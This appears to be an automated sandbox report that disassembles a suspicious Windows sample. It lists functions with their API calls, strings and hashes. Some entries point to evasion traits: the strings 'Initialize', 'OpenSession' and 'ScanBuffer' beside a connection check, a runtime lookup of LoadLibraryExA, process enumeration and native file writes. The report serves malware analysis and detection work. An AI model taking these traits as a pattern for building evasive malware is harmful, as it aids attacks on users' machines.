                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1897104825-0
                                                                                                    • Opcode ID: 3f1f6e31735f02499abf9ae86de98f3e406f13b3a0e767e036612d8ea3804c06
                                                                                                    • Instruction ID: 96a506439a3da0c0acf1ae36401332a7f8b321bf6b06452e70afcc47df20032c
                                                                                                    • Opcode Fuzzy Hash: 3f1f6e31735f02499abf9ae86de98f3e406f13b3a0e767e036612d8ea3804c06
                                                                                                    • Instruction Fuzzy Hash: 6121D075A50318BEEB11EAE4CC92FDEB7BCEB08700F510466F610FB1C1DAB4AA458794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0330BC8E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckConnectionInternet
                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                    • Opcode ID: ff942b1520f7b43a0d265c6facf21515f7a493d56994174693a3a869767a46cc
                                                                                                    • Instruction ID: d8193e747c6cb614e15391eaddab89ba224fcda3396715d8b308960f485d2e70
                                                                                                    • Opcode Fuzzy Hash: ff942b1520f7b43a0d265c6facf21515f7a493d56994174693a3a869767a46cc
                                                                                                    • Instruction Fuzzy Hash: 1E414139B203089FDB04FBA5C9E1EDEF3B9EF48740F514425E110AB252DAB0ED418B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 032B5228: SysAllocStringLen.OLEAUT32(?,?), ref: 032B5236
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0330B76E), ref: 0330B6DB
                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0330B715
                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0330B742
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0330B74B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3764614163-0
                                                                                                    • Opcode ID: bad0f232eaafaf47a1215a82cb804f844ff1c01d79c78b54852837ac6648f33e
                                                                                                    • Instruction ID: 2db65a84b278f9c842e8f0fbdb0705dacbe2de59f85d4a381c8919ee47b491a4
                                                                                                    • Opcode Fuzzy Hash: bad0f232eaafaf47a1215a82cb804f844ff1c01d79c78b54852837ac6648f33e
                                                                                                    • Instruction Fuzzy Hash: E821ED75A50308BEEB10EBA4CD92FDEB7BCDF04B00F614461B610FB1C1D6B4AB448A54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032CEF38: CLSIDFromProgID.OLE32(00000000,?,00000000,032CEF85,?,?,?,00000000), ref: 032CEF65
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,032CF078,00000000,00000000,032CEFF7,?,00000000,032CF067), ref: 032CEFE3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                    • String ID:
                                                                                                    • API String ID: 2151042543-0
                                                                                                    • Opcode ID: ccf0ce471d36aef00869ba728a5c1f80e96bf9fe21d2eaa6b98b9f891f25d75b
                                                                                                    • Instruction ID: 0dc97bec90c73e04b3d6289219029ac5337a4e20239b93f6460673be2db39344
                                                                                                    • Opcode Fuzzy Hash: ccf0ce471d36aef00869ba728a5c1f80e96bf9fe21d2eaa6b98b9f891f25d75b
                                                                                                    • Instruction Fuzzy Hash: 4E01F7346387846ED711DF609C128BEB7FCE749B40F520579F800D2A81EAB45D40C664
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,0331967E), ref: 03319612
                                                                                                      • Part of subcall function 032F7438: GetCurrentProcessId.KERNEL32(?,00000000,032F75B0), ref: 032F7459
                                                                                                      • Part of subcall function 032F7438: GlobalAddAtomA.KERNEL32(00000000), ref: 032F748C
                                                                                                      • Part of subcall function 032F7438: GetCurrentThreadId.KERNEL32 ref: 032F74A7
                                                                                                      • Part of subcall function 032F7438: GlobalAddAtomA.KERNEL32(00000000), ref: 032F74DD
                                                                                                      • Part of subcall function 032F7438: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,032F75B0), ref: 032F74F3
                                                                                                      • Part of subcall function 032F7438: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,032F75B0), ref: 032F7577
                                                                                                      • Part of subcall function 032F7438: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 032F7588
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3557136124-0
                                                                                                    • Opcode ID: 4b7fc90706455d7068b1c0e6625215bcfa16aba2119fb19dd7b04e6d8f3375ef
                                                                                                    • Instruction ID: c4e9b6cace5cb4bd57a84bb39edca96b3a9f2ccc3b6c55b61617913ef5638bd4
                                                                                                    • Opcode Fuzzy Hash: 4b7fc90706455d7068b1c0e6625215bcfa16aba2119fb19dd7b04e6d8f3375ef
                                                                                                    • Instruction Fuzzy Hash: C1F04F7C2743448FD315FB29FC9691973A8E78AB147A5C175E9048B21CCAF4A851CFA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 03308838: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03308ABF,?,?,03308B51,00000000,03308C2D), ref: 0330884C
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03308864
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03308876
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03308888
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0330889A
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 033088AC
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 033088BE
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32First), ref: 033088D0
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 033088E2
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 033088F4
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03308906
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03308918
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0330892A
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0330893C
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0330894E
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03308960
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03308972
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03308AC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 2242398760-0
                                                                                                    • Opcode ID: 4dd9df16f988af7f6bcd4fb96c6d6fc6a23b461963676af3cd96d0c69f8afb82
                                                                                                    • Instruction ID: b6bbc4c41950e7114d596107f01b378d7a4145cbff133b0c7c12682676f21b29
                                                                                                    • Opcode Fuzzy Hash: 4dd9df16f988af7f6bcd4fb96c6d6fc6a23b461963676af3cd96d0c69f8afb82
                                                                                                    • Instruction Fuzzy Hash: 70C08CA2602620278A10F6F82DD88D3878CCE491F370804B2B509EB141D3368C10D2A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,032F75B0), ref: 032F7459
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 032F748C
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032F74A7
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 032F74DD
                                                                                                    • RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,032F75B0), ref: 032F74F3
                                                                                                      • Part of subcall function 032C7B44: InitializeCriticalSection.KERNEL32(List,?,?,032F7509,00000000,00000000,?,?,00000000,032F75B0), ref: 032C7B63
                                                                                                      • Part of subcall function 032F7040: SetErrorMode.KERNEL32(00008000), ref: 032F7059
                                                                                                      • Part of subcall function 032F7040: GetModuleHandleA.KERNEL32(USER32,00000000,032F71A6,?,00008000), ref: 032F707D
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 032F708A
                                                                                                      • Part of subcall function 032F7040: LoadLibraryA.KERNEL32(imm32.dll,00000000,032F71A6,?,00008000), ref: 032F70A6
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 032F70C8
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 032F70DD
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 032F70F2
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 032F7107
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 032F711C
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 032F7131
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 032F7146
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 032F715B
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 032F7170
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 032F7185
                                                                                                      • Part of subcall function 032F7040: SetErrorMode.KERNEL32(?,032F71AD,00008000), ref: 032F71A0
                                                                                                      • Part of subcall function 03301550: GetKeyboardLayout.USER32(00000000), ref: 03301595
                                                                                                      • Part of subcall function 03301550: GetDC.USER32(00000000), ref: 033015EA
                                                                                                      • Part of subcall function 03301550: GetDeviceCaps.GDI32(00000000,0000005A), ref: 033015F4
                                                                                                      • Part of subcall function 03301550: ReleaseDC.USER32(00000000,00000000), ref: 033015FF
                                                                                                      • Part of subcall function 03302758: LoadIconA.USER32(00000000,MAINICON), ref: 0330284F
                                                                                                      • Part of subcall function 03302758: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 03302881
                                                                                                      • Part of subcall function 03302758: OemToCharA.USER32(?,?), ref: 03302894
                                                                                                      • Part of subcall function 03302758: CharNextA.USER32(?,00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 033028D3
                                                                                                      • Part of subcall function 03302758: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 033028D9
                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,032F75B0), ref: 032F7577
                                                                                                    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 032F7588
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
                                                                                                    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                                    • API String ID: 1515865724-1126952177
                                                                                                    • Opcode ID: 513b89420fc4ca83eb8cc00186448868bb139419cba49364ef61cb37102fb27a
                                                                                                    • Instruction ID: 00dba80b43e5c4304282899ec620e10ed870b7fb15663973b0b06b14b096108e
                                                                                                    • Opcode Fuzzy Hash: 513b89420fc4ca83eb8cc00186448868bb139419cba49364ef61cb37102fb27a
                                                                                                    • Instruction Fuzzy Hash: CD415DB8A203059FCB04FFB9E8C099EB7F8EB58340F418065E505EF355DBB1A9808B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 03308D1C
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 03308D33
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 03308D39
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 03308DC7
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 03308DD3
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 03308DE7
                                                                                                    Strings
                                                                                                    • LoadLibraryExA, xrefs: 03308D29
                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 03308D2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$AddressHandleModuleProc
                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                    • API String ID: 1061262613-1650066521
                                                                                                    • Opcode ID: 7a9fe326c97c7c23a357c69b477b2fe67e0df107110a3b0f5da3d0443a2cc1db
                                                                                                    • Instruction ID: 5bdf1d916a32a088b11aa3d0d2ac85f17681305738d4329e83bd9b5af1fbe956
                                                                                                    • Opcode Fuzzy Hash: 7a9fe326c97c7c23a357c69b477b2fe67e0df107110a3b0f5da3d0443a2cc1db
                                                                                                    • Instruction Fuzzy Hash: 8B313A76600305BBDF60EB68CCD1F9AB7BCAF14364F044250EA24AF2C1D770A990CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadIconA.USER32(00000000,MAINICON), ref: 0330284F
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 03302881
                                                                                                    • OemToCharA.USER32(?,?), ref: 03302894
                                                                                                    • CharNextA.USER32(?,00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 033028D3
                                                                                                    • CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 033028D9
                                                                                                      • Part of subcall function 03302AAC: GetClassInfoA.USER32(032B0000,03302748,?), ref: 03302B0B
                                                                                                      • Part of subcall function 03302AAC: RegisterClassA.USER32(0331B650), ref: 03302B23
                                                                                                      • Part of subcall function 03302AAC: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 03302BBF
                                                                                                      • Part of subcall function 03302AAC: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 03302BE1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                                                    • String ID: MAINICON
                                                                                                    • API String ID: 2763768735-2283262055
                                                                                                    • Opcode ID: 6d7db63829809a045b8bb3113478d9baf62b4031d0db6ab87d74dcbcd91aa6d1
                                                                                                    • Instruction ID: 6d8f8312850415ed3a2e10825376aa8caf514b5e2f2e37e3a5cb153ed44c5ff9
                                                                                                    • Opcode Fuzzy Hash: 6d7db63829809a045b8bb3113478d9baf62b4031d0db6ab87d74dcbcd91aa6d1
                                                                                                    • Instruction Fuzzy Hash: EC514C74A143449FDB50EF28D8C4BCA7BF8AB15304F0845B9D848CF386D7B5D9888B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?,032B205D), ref: 032B186C
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,032B205D), ref: 032B1882
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 0a77473c031e2c4c3fbb08081e63adde6931e29b151f0e78f5e1d5716f7c0f2d
                                                                                                    • Instruction ID: dccc47fc3d6a54a4ee12ea9bb0d8937e4a72b3b8f254d87b4e8ab9ecfb43e5b1
                                                                                                    • Opcode Fuzzy Hash: 0a77473c031e2c4c3fbb08081e63adde6931e29b151f0e78f5e1d5716f7c0f2d
                                                                                                    • Instruction Fuzzy Hash: 8FB10272620B518BC725DF2CE4E43A5BBF4FB95390F1882AEE4558B388D774B4A1C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

• Control-flow graph (rendered image not preserved): entry block 032B1B28, basic blocks in 032B1784-032B17BF and 032B1B28-032B1D07; API calls Sleep and VirtualFree; internal calls to 032B155C, 032B159C, 032B15FC and 032B16E0.
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 032B1BB3
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?), ref: 032B1BCD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 30e6be7bca18b11942095caca8450db97739f8f14743049e2b91e5cefbeeec19
                                                                                                    • Instruction ID: a297cc0219ba466bb58f90fee39f3352d4e625302029be89b477a30cd81f6d03
                                                                                                    • Opcode Fuzzy Hash: 30e6be7bca18b11942095caca8450db97739f8f14743049e2b91e5cefbeeec19
                                                                                                    • Instruction Fuzzy Hash: C951E1316203018FD725DF28D9E5796BBF8EF45390F2882AEE4448B286D7B4E4D4C7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

• Control-flow graph (rendered image not preserved): entry block 032D7674, basic blocks in 032D7674-032D772E; API call MulDiv; internal calls to 032D7630, 032B4820, 032D021C, 032D02BC, 032D0320, 032D0550, 032D028C and 032B38D0.
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 032D769A
                                                                                                      • Part of subcall function 032D7630: GetDC.USER32(00000000), ref: 032D7639
                                                                                                      • Part of subcall function 032D7630: SelectObject.GDI32(00000000,058A00B4), ref: 032D764B
                                                                                                      • Part of subcall function 032D7630: GetTextMetricsA.GDI32(00000000), ref: 032D7656
                                                                                                      • Part of subcall function 032D7630: ReleaseDC.USER32(00000000,00000000), ref: 032D7667
                                                                                                    Strings
                                                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 032D76F0
                                                                                                    • MS Shell Dlg 2, xrefs: 032D7704
                                                                                                    • Tahoma, xrefs: 032D76BC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                                    • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                                                    • API String ID: 2013942131-1011973972
                                                                                                    • Opcode ID: 0e1c638867564a2aaeefefa07f4948140eac6fe95844ed2563f18ea8f8bfe85a
                                                                                                    • Instruction ID: 2ae82f65014296b73a0c44a230e9072c63a0a7a442ead76d7481bd0fe39d96b5
                                                                                                    • Opcode Fuzzy Hash: 0e1c638867564a2aaeefefa07f4948140eac6fe95844ed2563f18ea8f8bfe85a
                                                                                                    • Instruction Fuzzy Hash: 1211A338620708AFDB10EFACD84095D7BB9EB09700F9188A5E8009BB64D7799D81CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

• Control-flow graph (rendered image not preserved): entry block 032CEA38, basic blocks in 032CEA38-032CEAE2; API calls GetClassInfoA, UnregisterClassA, RegisterClassA and SetWindowLongA; internal calls to 032B738C and 032CE97C.
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(032B0000,032CEA28,?), ref: 032CEA59
                                                                                                    • UnregisterClassA.USER32(032CEA28,032B0000), ref: 032CEA82
                                                                                                    • RegisterClassA.USER32(0331AAF8), ref: 032CEA8C
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 032CEAD7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4025006896-0
